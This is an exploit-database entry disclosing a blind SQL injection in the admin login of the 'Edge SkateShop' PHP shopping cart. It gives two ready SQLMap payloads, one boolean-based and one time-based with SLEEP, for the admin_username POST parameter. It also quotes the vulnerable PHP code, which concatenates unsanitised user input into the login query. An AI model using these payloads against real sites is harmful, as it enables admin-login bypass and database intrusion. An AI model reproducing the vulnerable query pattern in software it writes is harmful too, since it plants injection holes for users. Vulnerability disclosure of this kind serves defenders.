Edge SkateShop Blind SQL Injection



EKU-ID: 6161 CVE: OSVDB-ID:
Author: Andrea Bocchetti Published: 2016-12-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Edge SkateShop Blind Sql Injection
# Date: 12/12/2016
# Exploit Author: Andrea Bocchetti
# Vendor HomePage: http://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html
# Software Link: http://www.sourcecodester.com/sites/default/files/download/gebbz/edgesketch.zip
# Version : n/a
# Tested on: kali linux
 
# Proof of Concept (Using SQLMap) :
 
Parameter: admin_username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: admin_username=-8520' OR 6015=6015-- PORX&admin_password=&admin_login=Scmp

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: admin_username=yzsT' OR SLEEP(5)-- Qgnn&admin_password=&admin_login=Scmp


Issue :
if(isset($_POST['admin_login']))
{
    $admin_username=$_POST['admin_username'];
    $admin_password=$_POST['admin_password'];
	

    $check_admin="select * from admin WHERE admin_username='$admin_username' AND admin_password='$admin_password'";

 
    $run=mysqli_query($dbcon,$check_admin);

    if(mysqli_num_rows($run))
    {
	 echo "<script>alert('You're successfully login!')</script>";
       
 echo "<script>window.open('Admin/index.php','_self')</script>";
       
$_SESSION['admin_username']=$admin_username;



    }
    else
    {
        echo "<script>alert('Username or password is incorrect!')</script>";
		  echo "<script>window.open('index.php','_self')</script>";
		
		 exit();
		
    }